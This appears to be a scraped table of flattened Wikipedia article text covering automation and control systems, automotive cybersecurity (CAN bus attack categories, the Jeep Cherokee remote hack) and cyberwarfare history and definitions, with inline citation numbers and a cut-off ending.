2002. Currently, there is a major effort underway in the vision community to develop a fully-automated tracking surveillance system. Automated video surveillance monitors people and vehicles in real-time within a busy environment. Existing automated surveillance systems are based on the environment they are primarily designed to observe, i.e., indoor, outdoor or airborne, the number of sensors that the automated system can handle and the mobility of sensors, i.e., stationary camera vs. mobile camera. The purpose of a surveillance system is to record properties and trajectories of objects in a given area, generate warnings or notify the designated authorities in case of occurrence of particular events. 104 As demands for safety and mobility have grown and technological possibilities have multiplied, interest in automation has grown. Seeking to accelerate the development and introduction of fully automated vehicles and highways, the U.S. Congress authorized more than $650 million over six years for intelligent transport systems (ITS) and demonstration projects in the 1991 Intermodal Surface Transportation Efficiency Act (ISTEA). Congress legislated in ISTEA that: 105 T he Secretary of Transportation shall develop an automated highway and vehicle prototype from which future fully automated intelligent vehicle-highway systems can be developed. Such development shall include research in human factors to ensure the success of the man-machine relationship. The goal of this program is to have the first fully automated highway roadway or an automated test track in operation by 1997. This system shall accommodate the installation of equipment in new and existing motor vehicles. Full automation commonly defined as requiring no control or very limited control by the driver; such automation would be accomplished through a combination of sensor, computer, and communications systems in vehicles and along the roadway. Fully automated driving would, in theory, allow closer vehicle spacing and higher speeds, which could enhance traffic capacity in places where additional road building is physically impossible, politically unacceptable, or prohibitively expensive. Automated controls also might enhance road safety by reducing the opportunity for driver error, which causes a large share of motor vehicle crashes. Other potential benefits include improved air quality (as a result of more-efficient traffic flows), increased fuel economy, and spin-off technologies generated during research and development related to automated highway systems. 106 Automated waste collection trucks prevent the need for as many workers as well as easing the level of labor required to provide the service. 107 Business process automation (BPA) is the technology-enabled automation of complex business processes. 108 It can help to streamline a business for simplicity, achieve digital transformation, increase service quality, improve service delivery or contain costs. BPA consists of integrating applications, restructuring labor resources and using software applications throughout the organization. Robotic process automation (RPA; or RPAAI for self-guided RPA 2.0) is an emerging field within BPA and uses AI. BPAs can be implemented in a number of business areas including marketing, sales and workflow. Home automation (also called domotics) designates an emerging practice of increased automation of household appliances and features in residential dwellings, particularly through electronic means that allow for things impracticable, overly expensive or simply not possible in recent past decades. The rise in the usage of home automation solutions has taken a turn reflecting the increased dependency of people on such automation solutions. However, the increased comfort that gets added through these automation solutions is remarkable. 109 Automation is essential for many scientific and clinical applications. 110 Therefore, automation has been extensively employed in laboratories. From as early as 1980 fully automated laboratories have already been working. 111 However, automation has not become widespread in laboratories due to its high cost. This may change with the ability of integrating low-cost devices with standard laboratory equipment. 112 113 Autosamplers are common devices used in laboratory automation. Logistics automation is the application of computer software or automated machinery to improve the efficiency of logistics operations. Typically this refers to operations within a warehouse or distribution center, with broader tasks undertaken by supply chain engineering systems and enterprise resource planning systems. Industrial automation deals primarily with the automation of manufacturing, quality control, and material handling processes. General-purpose controllers for industrial processes include programmable logic controllers, stand-alone I O modules, and computers. Industrial automation is to replace the human action and manual command-response activities with the use of mechanized equipment and logical programming commands. One trend is increased use of machine vision 114 to provide automatic inspection and robot guidance functions, another is a continuing increase in the use of robots. Industrial automation is simply required in industries. The rise of industrial automation is directly tied to the "Fourth Industrial Revolution", which is better known now as Industry 4.0. Originating from Germany, Industry 4.0 encompasses numerous devices, concepts, and machines, 115 as well as the advancement of the industrial internet of things (IIoT). An "Internet of Things is a seamless integration of diverse physical objects in the Internet through a virtual representation. 116 These new revolutionary advancements have drawn attention to the world of automation in an entirely new light and shown ways for it to grow to increase productivity and efficiency in machinery and manufacturing facilities. Industry 4.0 works with the IIoT and software hardware to connect in a way that (through communication technologies) add enhancements and improve manufacturing processes. Being able to create smarter, safer, and more advanced manufacturing is now possible with these new technologies. It opens up a manufacturing platform that is more reliable, consistent, and efficient than before. Implementation of systems such as SCADA is an example of software that takes place in Industrial Automation today. SCADA is a supervisory data collection software, just one of the many used in Industrial Automation. 117 Industry 4.0 vastly covers many areas in manufacturing and will continue to do so as time goes on. 115 Industrial robotics is a sub-branch in industrial automation that aids in various manufacturing processes. Such manufacturing processes include machining, welding, painting, assembling and material handling to name a few. 118 Industrial robots use various mechanical, electrical as well as software systems to allow for high precision, accuracy and speed that far exceed any human performance. The birth of industrial robots came shortly after World War II as the U.S. saw the need for a quicker way to produce industrial and consumer goods. 119 Servos, digital logic and solid-state electronics allowed engineers to build better and faster systems and over time these systems were improved and revised to the point where a single robot is capable of running 24 hours a day with little or no maintenance. In 1997, there were 700,000 industrial robots in use, the number has risen to 1.8M in 2017 120 In recent years, AI with robotics is also used in creating an automatic labeling solution, using robotic arms as the automatic label applicator, and AI for learning and detecting the products to be labelled. 121 Industrial automation incorporates programmable logic controllers in the manufacturing process. Programmable logic controllers (PLCs) use a processing system which allows for variation of controls of inputs and outputs using simple programming. PLCs make use of programmable memory, storing instructions and functions like logic, sequencing, timing, counting, etc. Using a logic-based language, a PLC can receive a variety of inputs and return a variety of logical outputs, the input devices being sensors and output devices being motors, valves, etc. PLCs are similar to computers, however, while computers are optimized for calculations, PLCs are optimized for control tasks and use in industrial environments. They are built so that only basic logic-based programming knowledge is needed and to handle vibrations, high temperatures, humidity, and noise. The greatest advantage PLCs offer is their flexibility. With the same basic controllers, a PLC can operate a range of different control systems. PLCs make it unnecessary to rewire a system to change the control system. This flexibility leads to a cost-effective system for complex and varied control systems. 122 PLCs can range from small "building brick" devices with tens of I O in a housing integral with the processor, to large rack-mounted modular devices with a count of thousands of I O, and which are often networked to other PLC and SCADA systems. They can be designed for multiple arrangements of digital and analog inputs and outputs (I O), extended temperature ranges, immunity to electrical noise, and resistance to vibration and impact. Programs to control machine operation are typically stored in battery-backed-up or non-volatile memory. It was from the automotive industry in the United States that the PLC was born. Before the PLC, control, sequencing, and safety interlock logic for manufacturing automobiles was mainly composed of relays, cam timers, drum sequencers, and dedicated closed-loop controllers. Since these could number in the hundreds or even thousands, the process for updating such facilities for the yearly model change-over was very time-consuming and expensive, as electricians needed to individually rewire the relays to change their operational characteristics. When digital computers became available, being general-purpose programmable devices, they were soon applied to control sequential and combinatorial logic in industrial processes. However, these early computers required specialist programmers and stringent operating environmental control for temperature, cleanliness, and power quality. To meet these challenges, the PLC was developed with several key attributes. It would tolerate the shop-floor environment, it would support discrete (bit-form) input and output in an easily extensible manner, it would not require years of training to use, and it would permit its operation to be monitored. Since many industrial processes have timescales easily addressed by millisecond response times, modern (fast, small, reliable) electronics greatly facilitate building reliable controllers, and performance could be traded off for reliability. 123 Agent-assisted automation refers to automation used by call center agents to handle customer inquiries. The key benefit of agent-assisted automation is compliance and error-proofing. Agents are sometimes not fully trained or they forget or ignore key steps in the process. The use of automation ensures that what is supposed to happen on the call actually does, every time. There are two basic types: desktop automation and automated voice solutions. Fundamentally, there are two types of control loop: open-loop control (feedforward), and closed-loop control (feedback). In open-loop control, the control action from the controller is independent of the "process output" (or "controlled process variable"). A good example of this is a central heating boiler controlled only by a timer, so that heat is applied for a constant time, regardless of the temperature of the building. The control action is the switching on off of the boiler, but the controlled variable should be the building temperature, but is not because this is open-loop control of the boiler, which does not give closed-loop control of the temperature. In closed loop control, the control action from the controller is dependent on the process output. In the case of the boiler analogy this would include a thermostat to monitor the building temperature, and thereby feed back a signal to ensure the controller maintains the building at the temperature set on the thermostat. A closed loop controller therefore has a feedback loop which ensures the controller exerts a control action to give a process output the same as the "reference input" or "set point". For this reason, closed loop controllers are also called feedback controllers. 124 The definition of a closed loop control system according to the British Standards Institution is "a control system possessing monitoring feedback, the deviation signal formed as a result of this feedback being used to control the action of a final control element in such a way as to tend to reduce the deviation to zero. 125 One of the simplest types of control is on-off control. An example is a thermostat used on household appliances which either open or close an electrical contact. (Thermostats were originally developed as true feedback-control mechanisms rather than the on-off common household appliance thermostat.) Sequence control, in which a programmed sequence of discrete operations is performed, often based on system logic that involves system states. An elevator control system is an example of sequence control. A proportional integral derivative controller (PID controller) is a control loop feedback mechanism (controller) widely used in industrial control systems. In a PID loop, the controller continuously calculates an error value e ( t ) displaystyle e(t) as the difference between a desired setpoint and a measured process variable and applies a correction based on proportional, integral, and derivative terms, respectively (sometimes denoted P, I, and D) which give their name to the controller type. The theoretical understanding and application date from the 1920s, and they are implemented in nearly all analog control systems; originally in mechanical controllers, and then using discrete electronics and latterly in industrial process computers. Sequential control may be either to a fixed sequence or to a logical one that will perform different actions depending on various system states. An example of an adjustable but otherwise fixed sequence is a timer on a lawn sprinkler. States refer to the various conditions that can occur in a use or sequence scenario of the system. An example is an elevator, which uses logic based on the system state to perform certain actions in response to its state and operator input. For example, if the operator presses the floor n button, the system will respond depending on whether the elevator is stopped or moving, going up or down, or if the door is open or closed, and other conditions. 127 Early development of sequential control was relay logic, by which electrical relays engage electrical contacts which either start or interrupt power to a device. Relays were first used in telegraph networks before being developed for controlling other devices, such as when starting and stopping industrial-sized electric motors or opening and closing solenoid valves. Using relays for control purposes allowed event-driven control, where actions could be triggered out of sequence, in response to external events. These were more flexible in their response than the rigid single-sequence cam timers. More complicated examples involved maintaining safe sequences for devices such as swing bridge controls, where a lock bolt needed to be disengaged before the bridge could be moved, and the lock bolt could not be released until the safety gates had already been closed. The total number of relays and cam timers can number into the hundreds or even thousands in some factories. Early programming techniques and languages were needed to make such systems manageable, one of the first being ladder logic, where diagrams of the interconnected relays resembled the rungs of a ladder. Special computers called programmable logic controllers were later designed to replace these collections of hardware with a single, more easily re-programmed unit. In a typical hard-wired motor start and stop circuit (called a control circuit) a motor is started by pushing a "Start" or "Run" button that activates a pair of electrical relays. The "lock-in" relay locks in contacts that keep the control circuit energized when the push-button is released. (The start button is a normally open contact and the stop button is a normally closed contact.) Another relay energizes a switch that powers the device that throws the motor starter switch (three sets of contacts for three-phase industrial power) in the main power circuit. Large motors use high voltage and experience high in-rush current, making speed important in making and breaking contact. This can be dangerous for personnel and property with manual switches. The "lock-in" contacts in the start circuit and the main power contacts for the motor are held engaged by their respective electromagnets until a "stop" or "off" button is pressed, which de-energizes the lock in relay. 128 Commonly interlocks are added to a control circuit. Suppose that the motor in the example is powering machinery that has a critical need for lubrication. In this case, an interlock could be added to ensure that the oil pump is running before the motor starts. Timers, limit switches, and electric eyes are other common elements in control circuits. Solenoid valves are widely used on compressed air or hydraulic fluid for powering actuators on mechanical components. While motors are used to supply continuous rotary motion, actuators are typically a better choice for intermittently creating a limited range of movement for a mechanical component, such as moving various mechanical arms, opening or closing valves, raising heavy press-rolls, applying pressure to presses. Computers can perform both sequential control and feedback control, and typically a single computer will do both in an industrial application. Programmable logic controllers (PLCs) are a type of special-purpose microprocessor that replaced many hardware components such as timers and drum sequencers used in relay logic type systems. General-purpose process control computers have increasingly replaced stand-alone controllers, with a single computer able to perform the operations of hundreds of controllers. Process control computers can process data from a network of PLCs, instruments, and controllers to implement typical (such as PID) control of many individual variables or, in some cases, to implement complex control algorithms using multiple inputs and mathematical manipulations. They can also analyze data and create real-time graphical displays for operators and run reports for operators, engineers, and management. Control of an automated teller machine (ATM) is an example of an interactive process in which a computer will perform a logic-derived response to a user selection based on information retrieved from a networked database. The ATM process has similarities with other online transaction processes. The different logical responses are called scenarios. Such processes are typically designed with the aid of use cases and flowcharts, which guide the writing of the software code. The earliest feedback control mechanism was the water clock invented by Greek engineer Ctesibius (285 222 BC). |
637 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Automotive_security | Automotive security refers to the branch of computer security focused on the cyber risks related to the automotive context. The increasingly high number of ECUs in vehicles and, alongside, the implementation of multiple different means of communication from and towards the vehicle in a remote and wireless manner led to the necessity of a branch of cybersecurity dedicated to the threats associated with vehicles. Not to be confused with automotive safety. The implementation of multiple ECUs (Electronic Control Units) inside vehicles began in the early '70s thanks to the development of integrated circuits and microprocessors that made it economically feasible to produce the ECUs on a large scale. 1 Since then the number of ECUs has increased to up to 100 per vehicle. These units nowadays control almost everything in the vehicle, from simple tasks such as activating the wipers to more safety-related ones like brake-by-wire or ABS (Anti-lock Braking System). Autonomous driving is also strongly reliant on the implementation of new, complex ECUs such as the ADAS, alongside sensors (lidars and radars) and their control units. Inside the vehicle, the ECUs are connected with each other through cabled or wireless communication networks, such as CAN bus (controller area network), MOST bus (Media Oriented System Transport), FlexRay (Automotive Network Communications Protocol) or RF (radio frequency) as in many implementations of TPMSs (tire-pressure monitoring systems). Many of these ECUs require data received through these networks that arrive from various sensors to operate and use such data to modify the behavior of the vehicle (e.g., the cruise control modifies the vehicle's speed depending on signals arriving from a button usually located on the steering wheel). Since the development of cheap wireless communication technologies such as Bluetooth, LTE, Wi-Fi, RFID and similar, automotive producers and OEMs have designed ECUs that implement such technologies with the goal of improving the experience of the driver and passengers. Safety-related systems such as the OnStar 2 from General Motors, telematic units, communication between smartphones and the vehicle's speakers through Bluetooth, Android Auto 3 and Apple CarPlay. 4 Threat models of the automotive world are based on both real-world and theoretically possible attacks. Most real-world attacks aim at the safety of the people in and around the car, by modifying the cyber-physical capabilities of the vehicle (e.g., steering, braking, accelerating without requiring actions from the driver 5 6 ), while theoretical attacks have been supposed to focus also on privacy-related goals, such as obtaining GPS data on the vehicle, or capturing microphone signals and similar. 7 Regarding the attack surfaces of the vehicle, they are usually divided in long-range, short-range, and local attack surfaces: 8 LTE and DSRC can be considered long-range ones, while Bluetooth and Wi-Fi are usually considered short-range although still wireless. Finally, USB, OBD-II and all the attack surfaces that require physical access to the car are defined as local. An attacker that is able to implement the attack through a long-range surface is considered stronger and more dangerous than the one that requires physical access to the vehicle. In 2015 the possibility of attacks on vehicles already on the market has been proven possible by Miller and Valasek, that managed to disrupt the driving of a Jeep Cherokee while remotely connecting to it through remote wireless communication. 9 10 The most common network used in vehicles and the one that is mainly used for safety-related communication is CAN, due to its real-time properties, simplicity, and cheapness. For this reason the majority of real-world attacks have been implemented against ECUs connected through this type of network. 5 6 9 10 The majority of attacks demonstrated either against actual vehicles or in testbeds fall in one or more of the following categories: Sniffing in the computer security field generally refers to the possibility of intercepting and logging packets or more generally data from a network. In the case of CAN, since it is a bus network, every node listens to all communication on the network. It is useful for the attacker to read data to learn the behavior of the other nodes of the network before implementing the actual attack. Usually, the final goal of the attacker is not to simply sniff the data on CAN, since the packets passing on this type of network are not usually valuable just to read. 8 Denial of service (DoS) in information security is usually described as an attack that has the objective of making a machine or a network unavailable. DoS attacks against ECUs connected to CAN buses can be done both against the network, by abusing the arbitration protocol used by CAN to always win the arbitration, and targeting the single ECU, by abusing the error handling protocol of CAN. 11 In this second case the attacker flags the messages of the victim as faulty to convince the victim of being broken and therefore shut itself off the network. 11 Spoofing attacks comprise all cases in which an attacker, by falsifying data, sends messages pretending to be another node of the network. In automotive security usually spoofing attacks are divided into masquerade and replay attacks. Replay attacks are defined as all those where the attacker pretends to be the victim and sends sniffed data that the victim sent in a previous iteration of authentication. Masquerade attacks are, on the contrary, spoofing attacks where the data payload has been created by the attacker. 12 Security researchers Charlie Miller and Chris Valasek have successfully demonstrated remote access to a wide variety of vehicle controls using a Jeep Cherokee as the target. They were able to control the radio, environmental controls, windshield wipers, and certain engine and brake functions. 10 The method used to hack the system was implementation of pre-programmed chip into the controller area network (CAN) bus. By inserting this chip into the CAN bus, he was able to send arbitrary message to CAN bus. One other thing that Miller has pointed out is the danger of the CAN bus, as it broadcasts the signal which the message can be caught by the hackers throughout the network. The control of the vehicle was all done remotely, manipulating the system without any physical interaction. Miller states that he could control any of some 1.4 million vehicles in the United States regardless of the location or distance, the only thing needed is for someone to turn on the vehicle to gain access. 13 The work by Miller and Valasek replicated earlier work completed and published by academics in 2010 and 2011 on a different vehicle. 14 The earlier work demonstrated the ability to compromise a vehicle remotely, over multiple wireless channels (including cellular), and the ability to remotely control critical components on the vehicle post-compromise, including the telematics unit and the car's brakes. While the earlier academic work was publicly visible, both in peer-reviewed scholarly publications 15 16 and in the press, 17 the Miller and Valesek work received even greater public visibility. The increasing complexity of devices and networks in the automotive context requires the application of security measures to limit the capabilities of a potential attacker. Since the early 2000 many different countermeasures have been proposed and, in some cases, applied. Following, a list of the most common security measures: 8 In June 2020, the United Nations Economic Commission for Europe (UNECE) World Forum for Harmonization of Vehicle Regulations released two new regulations, R155 and R156, establishing "clear performance and audit requirements for car manufacturers" in terms of automotive cybersecurity and software updates. 21 |
638 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cyberwarfare | Cyberwarfare is the use of cyber attacks against an enemy state, causing comparable harm to actual warfare and or disrupting vital computer systems. 1 Some intended outcomes could be espionage, sabotage, propaganda, manipulation or economic warfare. There is significant debate among experts regarding the definition of cyberwarfare, and even if such a thing exists. 2 One view is that the term is a misnomer since no cyber attacks to date could be described as a war. 3 An alternative view is that it is a suitable label for cyber attacks which cause physical damage to people and objects in the real world. 4 Many countries, including the United States, United Kingdom, Russia, China, Israel, Iran, and North Korea, 5 6 7 8 have active cyber capabilities for offensive and defensive operations. As states explore the use of cyber operations and combine capabilities, the likelihood of physical confrontation and violence playing out as a result of, or part of, a cyber operation is increased. However, meeting the scale and protracted nature of war is unlikely, thus ambiguity remains. 9 The first instance of kinetic military action used in response to a cyber-attack resulting in the loss of human life was observed on 5 May 2019, when the Israel Defense Forces targeted and destroyed a building associated with an ongoing cyber-attack. 10 11 There is ongoing debate over how cyberwarfare should be defined and no absolute definition is widely agreed upon. 9 12 While the majority of scholars, militaries, and governments use definitions that refer to state and state-sponsored actors, 9 13 14 other definitions may include non-state actors, such as terrorist groups, companies, political or ideological extremist groups, hacktivists, and transnational criminal organizations depending on the context of the work. 15 16 Examples of definitions proposed by experts in the field are as follows. 'Cyberwarfare' is used in a broad context to denote interstate use of technological force within computer networks in which information is stored, shared, or communicated online. 9 Raymond Charles Parks and David P. Duggan focused on analyzing cyberwarfare in terms of computer networks and pointed out that "Cyberwarfare is a combination of computer network attack and defense and special technical operations. 17 According to this perspective, the notion of cyber warfare brings a new paradigm into military doctrine. Paulo Shakarian and colleagues put forward the following definition of "cyber war" in 2013, drawing on Clausewitz's definition of war: "War is the continuation of politics by other means": 13 Cyber war is an extension of policy by actions taken in cyber space by state or nonstate actors that constitute a serious threat to a nation's security or are conducted in response to a perceived threat against a nation's security. Taddeo offered the following definition in 2012: The warfare grounded on certain uses of ICTs within an offensive or defensive military strategy endorsed by a state and aiming at the immediate disruption or control of the enemy's resources, and which is waged within the informational environment, with agents and targets ranging both on the physical and non-physical domains and whose level of violence may vary upon circumstances. 18 Robinson et al. proposed in 2015 that the intent of the attacker dictates whether an attack is warfare or not, defining cyber warfare as "the use of cyber attacks with a warfare-like intent. 12 In 2010, the former US National Coordinator for Security, Infrastructure Protection and Counter-terrorism, Richard A. Clarke, defined cyberwarfare as "actions by a nation-state to penetrate another nation's computers or networks for the purposes of causing damage or disruption". 14 The target's own cyber-physical infrastructure may be used by the adversary in case of a cyber conflict, thus weaponizing it. 19 There is debate on whether the term "cyber warfare" is accurate. In 2012, Eugene Kaspersky, founder of Kaspersky Lab, concluded that "cyberterrorism" is a more accurate term than "cyberwar. He states that "with today's attacks, you are clueless about who did it or when they will strike again. It's not cyber-war, but cyberterrorism. 20 Howard Schmidt, former Cyber Security Coordinator in the Obama administration, said that "there is no cyberwar... I think that is a terrible metaphor and I think that is a terrible concept. There are no winners in that environment. 21 Some experts take issue with the possible consequences linked to the warfare goal. In 2011, Ron Deibert, of Canada's Citizen Lab, warned of a "militarization of cyberspace", as militaristic responses may not be appropriate. 22 However, to date, even serious cyber-attacks that have disrupted large parts of a nation's electrical grid (230,000 customers, Ukraine, 2015) or affected access to medical care, thus endangering life (UK National Health Service, WannaCry, 2017) have not led to military action. 23 In 2017, Oxford academic Lucas Kello proposed a new term, "Unpeace", to denote highly damaging cyber actions whose non-violent effects do not rise to the level of traditional war. Such actions are neither warlike nor peace-like. Although they are non-violent, and thus not acts of war, their damaging effects on the economy and society may be greater than those of some armed attacks. 24 25 This term is closely related to the concept of the "grey zone", which came to prominence in 2017, describing hostile actions that fall below the traditional threshold of war. 26 But as Kello explained, technological unpeace differs from the grey zone as the term is commonly used in that unpeace by definition is never overtly violent or fatal, whereas some grey-zone actions are violent, even if they are not acts of war. 27 The term "cyberwarfare" is distinct from the term "cyber war". Cyberwarfare includes techniques, tactics and procedures that may be involved in a cyber war, but the term does not imply scale, protraction or violence, which are typically associated with the term "war", which inherently refers to a large-scale action, typically over a protracted period of time, and may include objectives seeking to utilize violence or the aim to kill. 9 A cyber war could accurately describe a protracted period of back-and-forth cyber attacks (including in combination with traditional military action) between warring states. To date, no such action is known to have occurred. Instead, armed forces have responded with tit-for-tat military cyber actions. For example, in June 2019, the United States launched a cyber attack against Iranian weapons systems in retaliation to the shooting down of a US drone in the Strait of Hormuz. 28 29 In addition to retaliatory digital attacks, countries can respond to cyber attacks with cyber sanctions. Sometimes, it is not easy to detect the attacker, but suspicions may focus on a particular country or group of countries. In these cases, unilateral and multilateral economic sanctions can be used instead of cyberwarfare. For example, the United States has frequently imposed economic sanctions related to cyber attacks. Two Executive Orders issued during the Obama administration, EO 13694 of 2015 30 and EO 13757 of 2016, 31 32 specifically focused on the implementation of the cyber sanctions. Subsequent US presidents have issued similar Executive Orders. The US Congress has also imposed cyber sanctions in response to cyberwarfare. For example, the Iran Cyber Sanctions Act of 2016 imposes sanctions on specific individuals responsible for cyber attacks. 33 Cyber warfare can present a multitude of threats towards a nation. At the most basic level, cyber attacks can be used to support traditional warfare. For example, tampering with the operation of air defenses via cyber means in order to facilitate an air attack. 34 Aside from these "hard" threats, cyber warfare can also contribute towards "soft" threats such as espionage and propaganda. Eugene Kaspersky, founder of Kaspersky Lab, equates large-scale cyber weapons, such as Flame and NetTraveler which his company discovered, to biological weapons, claiming that in an interconnected world, they have the potential to be equally destructive. 20 35 Traditional espionage is not an act of war, nor is cyber-espionage, and both are generally assumed to be ongoing between major powers. 36 Despite this assumption, some incidents can cause serious tensions between nations, and are often described as "attacks". For example: 37 Out of all cyber attacks, 25% of them are espionage based. 45 Computers and satellites that coordinate other activities are vulnerable components of a system and could lead to the disruption of equipment. Compromise of military systems, such as C4ISTAR components that are responsible for orders and communications could lead to their interception or malicious replacement. Power, water, fuel, communications, and transportation infrastructure all may be vulnerable to disruption. According to Clarke, the civilian realm is also at risk, noting that the security breaches have already gone beyond stolen credit card numbers, and that potential targets can also include the electric power grid, trains, or the stock market. 46 In mid-July 2010, security experts discovered a malicious software program called Stuxnet that had infiltrated factory computers and had spread to plants around the world. It is considered "the first attack on critical industrial infrastructure that sits at the foundation of modern economies, notes The New York Times. 47 Stuxnet, while extremely effective in delaying Iran's nuclear program for the development of nuclear weaponry, came at a high cost. For the first time, it became clear that not only could cyber weapons be defensive but they could be offensive. The large decentralization and scale of cyberspace makes it extremely difficult to direct from a policy perspective. Non-state actors can play as large a part in the cyberwar space as state actors, which leads to dangerous, sometimes disastrous, consequences. Small groups of highly skilled malware developers are able to as effectively impact global politics and cyber warfare as large governmental agencies. A major aspect of this ability lies in the willingness of these groups to share their exploits and developments on the web as a form of arms proliferation. This allows lesser hackers to become more proficient in creating the large scale attacks that once only a small handful were skillful enough to manage. In addition, thriving black markets for these kinds of cyber weapons are buying and selling these cyber capabilities to the highest bidder without regard for consequences. 48 49 In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS attacks often leverage internet-connected devices with vulnerable security measures to carry out these large-scale attacks. 50 DoS attacks may not be limited to computer-based methods, as strategic physical attacks against infrastructure can be just as devastating. For example, cutting undersea communication cables may severely cripple some regions and countries with regards to their information warfare ability. 51 The federal government of the United States admits that the electric power grid is susceptible to cyberwarfare. 52 53 The United States Department of Homeland Security works with industries to identify vulnerabilities and to help industries enhance the security of control system networks. The federal government is also working to ensure that security is built in as the next generation of "smart grid" networks are developed. 54 In April 2009, reports surfaced that China and Russia had infiltrated the U.S. electrical grid and left behind software programs that could be used to disrupt the system, according to current and former national security officials. 55 The North American Electric Reliability Corporation (NERC) has issued a public notice that warns that the electrical grid is not adequately protected from cyber attack. 56 China denies intruding into the U.S. electrical grid. 57 One countermeasure would be to disconnect the power grid from the Internet and run the net with droop speed control only. 58 Massive power outages caused by a cyber attack could disrupt the economy, distract from a simultaneous military attack, or create a national trauma. 59 Iranian hackers, possibly Iranian Cyber Army pushed a massive power outage for 12 hours in 44 of 81 provinces of Turkey, impacting 40 million people. Istanbul and Ankara were among the places suffering blackout. 60 Howard Schmidt, former Cyber-Security Coordinator of the US, commented on those possibilities: 21 It's possible that hackers have gotten into administrative computer systems of utility companies, but says those aren't linked to the equipment controlling the grid, at least not in developed countries. Schmidt has never heard that the grid itself has been hacked. In June 2019, Russia said that its electrical grid has been under cyber-attack by the United States. The New York Times reported that American hackers from the United States Cyber Command planted malware potentially capable of disrupting the Russian electrical grid. 61 Cyber propaganda is an effort to control information in whatever form it takes, and influence public opinion. 62 It is a form of psychological warfare, except it uses social media, fake news websites and other digital means. 63 In 2018, Sir Nicholas Carter, Chief of the General Staff of the British Army stated that this kind of attack from actors such as Russia "is a form of system warfare that seeks to de-legitimize the political and social system on which our military strength is based". 64 Jowell and O'Donnell (2006) state that "propaganda is the deliberate, systematic attempt to shape perceptions, manipulate cognitions, and direct behavior to achieve a response that furthers the desired intent of the propagandist" (p. 7). The internet is the most important means of communication today. People can convey their messages quickly across to a huge audience, and this can open a window for evil. Terrorist organizations can exploit this and may use this medium to brainwash people. It has been suggested that restricted media coverage of terrorist attacks would in turn decrease the number of terrorist attacks that occur afterwards. 65 In 2017, the WannaCry and Petya (NotPetya) cyber attacks, masquerading as ransomware, caused large-scale disruptions in Ukraine as well as to the U.K.'s National Health Service, pharmaceutical giant Merck, Maersk shipping company and other organizations around the world. 66 67 68 These attacks are also categorized as cybercrimes, specifically financial crime because they negatively affect a company or group. 69 The idea of a "cyber Pearl Harbor" has been debated by scholars, drawing an analogy to the historical act of war. 70 71 Others have used "cyber 9 11" to draw attention to the nontraditional, asymmetric, or irregular aspect of cyber action against a state. 72 73 There are a number of reasons nations undertake offensive cyber operations. Sandro Gaycken de , a cyber security expert and adviser to NATO, advocates that states take cyber warfare seriously as they are viewed as an attractive activity by many nations, in times of war and peace. Offensive cyber operations offer a large variety of cheap and risk-free options to weaken other countries and strengthen their own positions. Considered from a long-term, geostrategic perspective, cyber offensive operations can cripple whole economies, change political views, agitate conflicts within or among states, reduce their military efficiency and equalize the capacities of high-tech nations to that of low-tech nations, and use access to their critical infrastructures to blackmail them. 74 With the emergence of cyber as a substantial threat to national and global security, cyber war, warfare and or attacks also became a domain of interest and purpose for the military. 75 In the U.S., General Keith B. Alexander, first head of USCYBERCOM, told the Senate Armed Services Committee that computer network warfare is evolving so rapidly that there is a "mismatch between our technical capabilities to conduct operations and the governing laws and policies. Cyber Command is the newest global combatant and its sole mission is cyberspace, outside the traditional battlefields of land, sea, air and space. It will attempt to find and, when necessary, neutralize cyberattacks and to defend military computer networks. 76 Alexander sketched out the broad battlefield envisioned for the computer warfare command, listing the kind of targets that his new headquarters could be ordered to attack, including "traditional battlefield prizes command-and-control systems at military headquarters, air defense networks and weapons systems that require computers to operate. 76 One cyber warfare scenario, Cyber-ShockWave, which was wargamed on the cabinet level by former administration officials, raised issues ranging from the National Guard to the power grid to the limits of statutory authority. 77 78 79 80 The distributed nature of internet based attacks means that it is difficult to determine motivation and attacking party, meaning that it is unclear when a specific act should be considered an act of war. 81 Examples of cyberwarfare driven by political motivations can be found worldwide. In 2008, Russia began a cyber attack on the Georgian government website, which was carried out along with Georgian military operations in South Ossetia. In 2008, Chinese "nationalist hackers" attacked CNN as it reported on Chinese repression on Tibet. 82 Hackers from Armenia and Azerbaijan have actively participated in cyberwarfare as part of the Nagorno-Karabakh conflict, with Azerbaijani hackers targeting Armenian websites and posting Ilham Aliyev's statements. 83 84 Jobs in cyberwarfare have become increasingly popular in the military. All four branches of the United States military actively recruit for cyber warfare positions. 85 Potential targets in internet sabotage include all aspects of the Internet from the backbones of the web, to the internet service providers, to the varying types of data communication mediums and network equipment. This would include: web servers, enterprise information systems, client server systems, communication links, network equipment, and the desktops and laptops in businesses and homes. Electrical grids, financial networks, and telecommunication systems are also deemed vulnerable, especially due to current trends in computerization and automation. 86 Politically motivated hacktivism involves the subversive use of computers and computer networks to promote an agenda, and can potentially extend to attacks, theft and virtual sabotage that could be seen as cyberwarfare or mistaken for it. 87 Hacktivists use their knowledge and software tools to gain unauthorized access to computer systems they seek to manipulate or damage not for material gain or to cause widespread destruction, but to draw attention to their cause through well-publicized disruptions of select targets. Anonymous and other hacktivist groups are often portrayed in the media as cyber-terrorists, wreaking havoc by hacking websites, posting sensitive information about their victims, and threatening further attacks if their demands are not met. However, hacktivism is more than that. Actors are politically motivated to change the world, through the use of fundamentalism. Groups like Anonymous, however, have divided opinion with their methods. 88 Cyber attacks, including ransomware, can be used to generate income. States can use these techniques to generate significant sources of income, which can evade sanctions and perhaps while simultaneously harming adversaries (depending on targets). This tactic was observed in August 2019 when it was revealed North Korea had generated $2 billion to fund its weapons program, avoiding the blanket of sanctions levied by the United States, United Nations and the European Union. 89 90 Computer hacking represents a modern threat in ongoing global conflicts and industrial espionage and as such is presumed to widely occur. 86 It is typical that this type of crime is underreported to the extent they are known. According to McAfee's George Kurtz, corporations around the world face millions of cyberattacks a day. "Most of these attacks don't gain any media attention or lead to strong political statements by victims. 91 This type of crime is usually financially motivated. 92 But not all those who engage in cyberwarfare do so for financial or ideological reasons. There are institutes and companies like the University of Cincinnati 93 or the Kaspersky Security Lab which engage in cyberwarfare so as to better understand the field through actions like the researching and publishing of new security threats. 94 A number of countries conduct exercise to increase preparedness and explore the strategy, tactics and operations involved in conducting and defending against cyber attacks against hostile states, this is typically done in the form of war games. 95 The Cooperative Cyber Defence Centre of Excellence (CCDCE), part of the North Atlantic Treaty Organization (NATO), have 